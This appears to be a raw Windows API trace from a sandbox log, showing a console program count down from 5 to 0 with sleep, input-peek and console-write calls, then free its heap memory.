[0134.015] __iob_func () returned 0x75731208 [0134.015] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0134.016] lstrlenW (lpString="\x085") returned 2 [0134.016] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0x2) returned 1 [0134.017] Sleep (dwMilliseconds=0x64) [0134.135] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0134.172] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f21e [0134.172] Sleep (dwMilliseconds=0x64) [0134.304] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0134.309] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f21e [0134.309] Sleep (dwMilliseconds=0x64) [0134.687] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0134.693] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f21e [0134.693] Sleep (dwMilliseconds=0x64) [0134.798] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0134.939] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f21e [0134.940] Sleep (dwMilliseconds=0x64) [0135.043] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0135.073] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f21f [0135.073] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0xdfa98 | out: _Buffer="\x084") returned 2 [0135.073] SetConsoleCursorPosition (hConsoleOutput=0x3c, dwCursorPosition=0x3000d) returned 1 [0135.080] __iob_func () returned 0x75731208 [0135.080] _fileno (_File=0x75731228) returned 1 [0135.080] _errno () returned 0x5e905b0 [0135.080] _get_osfhandle (_FileHandle=1) returned 0x3c [0135.080] _errno () returned 0x5e905b0 [0135.080] GetFileType (hFile=0x3c) returned 0x2 [0135.080] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0135.080] GetFileType (hFile=0x3c) returned 0x2 [0135.081] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0135.087] __iob_func () returned 0x75731208 [0135.087] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0135.088] lstrlenW (lpString="\x084") returned 2 [0135.088] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0x2) returned 1 [0135.135] Sleep (dwMilliseconds=0x64) [0135.248] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0135.251] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f21f [0135.251] Sleep (dwMilliseconds=0x64) [0135.396] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0135.401] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f21f [0135.401] Sleep (dwMilliseconds=0x64) [0135.548] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0135.552] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f21f [0135.552] Sleep (dwMilliseconds=0x64) [0135.683] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0135.687] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f21f [0135.687] Sleep (dwMilliseconds=0x64) [0135.788] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0135.792] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f21f [0135.792] Sleep (dwMilliseconds=0x64) [0135.944] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0135.957] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f21f [0135.957] Sleep (dwMilliseconds=0x64) [0136.186] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0136.190] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f220 [0136.190] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0xdfa98 | out: _Buffer="\x083") returned 2 [0136.190] SetConsoleCursorPosition (hConsoleOutput=0x3c, dwCursorPosition=0x3000d) returned 1 [0136.192] __iob_func () returned 0x75731208 [0136.192] _fileno (_File=0x75731228) returned 1 [0136.192] _errno () returned 0x5e905b0 [0136.192] _get_osfhandle (_FileHandle=1) returned 0x3c [0136.192] _errno () returned 0x5e905b0 [0136.192] GetFileType (hFile=0x3c) returned 0x2 [0136.192] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0136.192] GetFileType (hFile=0x3c) returned 0x2 [0136.192] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0136.195] __iob_func () returned 0x75731208 [0136.195] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0136.195] lstrlenW (lpString="\x083") returned 2 [0136.195] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0x2) returned 1 [0136.216] Sleep (dwMilliseconds=0x64) [0136.371] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0136.375] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f220 [0136.375] Sleep (dwMilliseconds=0x64) [0136.477] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0136.478] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f220 [0136.478] Sleep (dwMilliseconds=0x64) [0136.629] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0136.632] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f220 [0136.632] Sleep (dwMilliseconds=0x64) [0136.733] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0136.735] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f220 [0136.735] Sleep (dwMilliseconds=0x64) [0136.871] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0136.938] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f220 [0136.938] Sleep (dwMilliseconds=0x64) [0137.079] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0137.087] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f221 [0137.087] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0xdfa98 | out: _Buffer="\x082") returned 2 [0137.087] SetConsoleCursorPosition (hConsoleOutput=0x3c, dwCursorPosition=0x3000d) returned 1 [0137.092] __iob_func () returned 0x75731208 [0137.092] _fileno (_File=0x75731228) returned 1 [0137.092] _errno () returned 0x5e905b0 [0137.092] _get_osfhandle (_FileHandle=1) returned 0x3c [0137.092] _errno () returned 0x5e905b0 [0137.092] GetFileType (hFile=0x3c) returned 0x2 [0137.092] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0137.092] GetFileType (hFile=0x3c) returned 0x2 [0137.092] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0137.095] __iob_func () returned 0x75731208 [0137.095] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0137.095] lstrlenW (lpString="\x082") returned 2 [0137.096] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0x2) returned 1 [0137.097] Sleep (dwMilliseconds=0x64) [0137.255] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0137.259] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f221 [0137.259] Sleep (dwMilliseconds=0x64) [0137.362] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0137.371] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f221 [0137.372] Sleep (dwMilliseconds=0x64) [0137.484] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0137.536] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f221 [0137.536] Sleep (dwMilliseconds=0x64) [0137.666] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0137.671] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f221 [0137.671] Sleep (dwMilliseconds=0x64) [0137.822] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0137.830] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f221 [0137.831] Sleep (dwMilliseconds=0x64) [0137.938] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0137.944] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f221 [0137.944] Sleep (dwMilliseconds=0x64) [0138.059] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0138.062] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f222 [0138.062] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0xdfa98 | out: _Buffer="\x081") returned 2 [0138.062] SetConsoleCursorPosition (hConsoleOutput=0x3c, dwCursorPosition=0x3000d) returned 1 [0138.066] __iob_func () returned 0x75731208 [0138.066] _fileno (_File=0x75731228) returned 1 [0138.066] _errno () returned 0x5e905b0 [0138.066] _get_osfhandle (_FileHandle=1) returned 0x3c [0138.066] _errno () returned 0x5e905b0 [0138.066] GetFileType (hFile=0x3c) returned 0x2 [0138.066] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0138.066] GetFileType (hFile=0x3c) returned 0x2 [0138.066] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0138.124] __iob_func () returned 0x75731208 [0138.124] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0138.124] lstrlenW (lpString="\x081") returned 2 [0138.124] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0x2) returned 1 [0138.127] Sleep (dwMilliseconds=0x64) [0138.254] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0138.259] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f222 [0138.259] Sleep (dwMilliseconds=0x64) [0138.360] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0138.363] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f222 [0138.363] Sleep (dwMilliseconds=0x64) [0138.474] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0138.476] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f222 [0138.476] Sleep (dwMilliseconds=0x64) [0138.580] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0138.582] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f222 [0138.582] Sleep (dwMilliseconds=0x64) [0138.699] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0138.702] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f222 [0138.703] Sleep (dwMilliseconds=0x64) [0138.829] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0138.834] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f222 [0138.834] Sleep (dwMilliseconds=0x64) [0138.969] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0138.975] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f222 [0138.975] Sleep (dwMilliseconds=0x64) [0139.106] PeekConsoleInputW (in: hConsoleInput=0x38, lpBuffer=0xdfb00, nLength=0x2, lpNumberOfEventsRead=0xdfad4 | out: lpBuffer=0xdfb00, lpNumberOfEventsRead=0xdfad4) returned 1 [0139.110] time (in: timer=0xdfae0 | out: timer=0xdfae0) returned 0x6151f223 [0139.110] _vsnwprintf (in: _Buffer=0xdfd24, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0xdfa98 | out: _Buffer="\x080") returned 2 [0139.110] SetConsoleCursorPosition (hConsoleOutput=0x3c, dwCursorPosition=0x3000d) returned 1 [0139.113] __iob_func () returned 0x75731208 [0139.113] _fileno (_File=0x75731228) returned 1 [0139.113] _errno () returned 0x5e905b0 [0139.113] _get_osfhandle (_FileHandle=1) returned 0x3c [0139.113] _errno () returned 0x5e905b0 [0139.113] GetFileType (hFile=0x3c) returned 0x2 [0139.113] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0139.113] GetFileType (hFile=0x3c) returned 0x2 [0139.113] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0139.116] __iob_func () returned 0x75731208 [0139.116] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0139.116] lstrlenW (lpString="\x080") returned 2 [0139.116] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xdfd24*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0xdfd24*, lpNumberOfCharsWritten=0xdfa98*=0x2) returned 1 [0139.119] Sleep (dwMilliseconds=0x64) [0139.261] __iob_func () returned 0x75731208 [0139.261] _fileno (_File=0x75731228) returned 1 [0139.261] _errno () returned 0x5e905b0 [0139.261] _get_osfhandle (_FileHandle=1) returned 0x3c [0139.261] _errno () returned 0x5e905b0 [0139.261] GetFileType (hFile=0x3c) returned 0x2 [0139.261] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0139.261] GetFileType (hFile=0x3c) returned 0x2 [0139.261] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xdfa74 | out: lpMode=0xdfa74) returned 1 [0139.265] __iob_func () returned 0x75731208 [0139.265] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0139.265] lstrlenW (lpString="\n") returned 1 [0139.265] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x15106c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0xdfa98, lpReserved=0x0 | out: lpBuffer=0x15106c*, lpNumberOfCharsWritten=0xdfa98*=0x1) returned 1 [0139.285] GetProcessHeap () returned 0x4510000 [0139.285] GetProcessHeap () returned 0x4510000 [0139.285] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451da10) returned 1 [0139.285] GetProcessHeap () returned 0x4510000 [0139.285] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451da10) returned 0xa0 [0139.285] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451da10 | out: hHeap=0x4510000) returned 1 [0139.285] GetProcessHeap () returned 0x4510000 [0139.285] GetProcessHeap () returned 0x4510000 [0139.285] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451d160) returned 1 [0139.285] GetProcessHeap () returned 0x4510000 [0139.285] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451d160) returned 0x10 [0139.285] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451d160 | out: hHeap=0x4510000) returned 1 [0139.285] GetProcessHeap () returned 0x4510000 [0139.285] GetProcessHeap () returned 0x4510000 [0139.285] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c378) returned 1 [0139.285] GetProcessHeap () returned 0x4510000 [0139.285] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451c378) returned 0x14 [0139.285] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c378 | out: hHeap=0x4510000) returned 1 [0139.285] GetProcessHeap () returned 0x4510000 [0139.285] GetProcessHeap () returned 0x4510000 [0139.285] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x45179c0) returned 1 [0139.285] GetProcessHeap () returned 0x4510000 [0139.285] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x45179c0) returned 0x4 [0139.285] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x45179c0 | out: hHeap=0x4510000) returned 1 [0139.285] GetProcessHeap () returned 0x4510000 [0139.285] GetProcessHeap () returned 0x4510000 [0139.285] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451d0e8) returned 1 [0139.285] GetProcessHeap () returned 0x4510000 [0139.285] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451d0e8) returned 0x10 [0139.286] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451d0e8 | out: hHeap=0x4510000) returned 1 [0139.286] GetProcessHeap () returned 0x4510000 [0139.286] GetProcessHeap () returned 0x4510000 [0139.286] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c1d8) returned 1 [0139.286] GetProcessHeap () returned 0x4510000 [0139.286] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451c1d8) returned 0x14 [0139.286] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c1d8 | out: hHeap=0x4510000) returned 1 [0139.286] GetProcessHeap () returned 0x4510000 [0139.286] GetProcessHeap () returned 0x4510000 [0139.286] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c538) returned 1 [0139.286] GetProcessHeap () returned 0x4510000 [0139.286] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451c538) returned 0x208 [0139.286] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c538 | out: hHeap=0x4510000) returned 1 [0139.286] GetProcessHeap () returned 0x4510000 [0139.286] GetProcessHeap () returned 0x4510000 [0139.286] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x45174c8) returned 1 [0139.286] GetProcessHeap () returned 0x4510000 [0139.286] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x45174c8) returned 0x10 [0139.286] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x45174c8 | out: hHeap=0x4510000) returned 1 [0139.286] GetProcessHeap () returned 0x4510000 [0139.286] GetProcessHeap () returned 0x4510000 [0139.286] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c2f8) returned 1 [0139.286] GetProcessHeap () returned 0x4510000 [0139.286] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451c2f8) returned 0x14 [0139.286] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c2f8 | out: hHeap=0x4510000) returned 1 [0139.286] GetProcessHeap () returned 0x4510000 [0139.286] GetProcessHeap () returned 0x4510000 [0139.286] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451e408) returned 1 [0139.286] GetProcessHeap () returned 0x4510000 [0139.286] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451e408) returned 0x200 [0139.286] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451e408 | out: hHeap=0x4510000) returned 1 [0139.286] GetProcessHeap () returned 0x4510000 [0139.286] GetProcessHeap () returned 0x4510000 [0139.287] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451d1f0) returned 1 [0139.287] GetProcessHeap () returned 0x4510000 [0139.287] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451d1f0) returned 0x10 [0139.287] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451d1f0 | out: hHeap=0x4510000) returned 1 [0139.287] GetProcessHeap () returned 0x4510000 [0139.287] GetProcessHeap () returned 0x4510000 [0139.287] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c4d8) returned 1 [0139.287] GetProcessHeap () returned 0x4510000 [0139.287] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451c4d8) returned 0x14 [0139.287] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c4d8 | out: hHeap=0x4510000) returned 1 [0139.287] GetProcessHeap () returned 0x4510000 [0139.287] GetProcessHeap () returned 0x4510000 [0139.287] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451d0a0) returned 1 [0139.287] GetProcessHeap () returned 0x4510000 [0139.287] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451d0a0) returned 0xa [0139.287] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451d0a0 | out: hHeap=0x4510000) returned 1 [0139.287] GetProcessHeap () returned 0x4510000 [0139.287] GetProcessHeap () returned 0x4510000 [0139.287] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451d058) returned 1 [0139.287] GetProcessHeap () returned 0x4510000 [0139.287] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451d058) returned 0x10 [0139.287] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451d058 | out: hHeap=0x4510000) returned 1 [0139.287] GetProcessHeap () returned 0x4510000 [0139.287] GetProcessHeap () returned 0x4510000 [0139.287] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c218) returned 1 [0139.287] GetProcessHeap () returned 0x4510000 [0139.287] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451c218) returned 0x14 [0139.288] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c218 | out: hHeap=0x4510000) returned 1 [0139.288] GetProcessHeap () returned 0x4510000 [0139.288] GetProcessHeap () returned 0x4510000 [0139.288] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451d268) returned 1 [0139.288] GetProcessHeap () returned 0x4510000 [0139.288] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451d268) returned 0xa [0139.288] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451d268 | out: hHeap=0x4510000) returned 1 [0139.288] GetProcessHeap () returned 0x4510000 [0139.288] GetProcessHeap () returned 0x4510000 [0139.288] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451d028) returned 1 [0139.288] GetProcessHeap () returned 0x4510000 [0139.288] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451d028) returned 0x10 [0139.288] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451d028 | out: hHeap=0x4510000) returned 1 [0139.288] GetProcessHeap () returned 0x4510000 [0139.288] GetProcessHeap () returned 0x4510000 [0139.288] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c318) returned 1 [0139.288] GetProcessHeap () returned 0x4510000 [0139.288] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x451c318) returned 0x14 [0139.288] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x451c318 | out: hHeap=0x4510000) returned 1 [0139.288] GetProcessHeap () returned 0x4510000 [0139.288] GetProcessHeap () returned 0x4510000 [0139.288] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x4513728) returned 1 [0139.288] GetProcessHeap () returned 0x4510000 [0139.288] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x4513728) returned 0x2 [0139.288] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x4513728 | out: hHeap=0x4510000) returned 1 [0139.288] GetProcessHeap () returned 0x4510000 [0139.288] GetProcessHeap () returned 0x4510000 [0139.288] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x45187f0) returned 1 [0139.288] GetProcessHeap () returned 0x4510000 [0139.288] RtlSizeHeap (HeapHandle=0x4510000, Flags=0x0, MemoryPointer=0x45187f0) returned 0x14 [0139.288] HeapFree (in: hHeap=0x4510000, dwFlags=0x0, lpMem=0x45187f0 | out: hHeap=0x4510000) returned 1 [0139.288] GetProcessHeap () returned 0x4510000 [0139.288] GetProcessHeap () returned 0x4510000 [0139.289] HeapValidate (hHeap=0x4510000, dwFlags=0x0, lpMem=0x45170d8) returned 1 [0139.289] 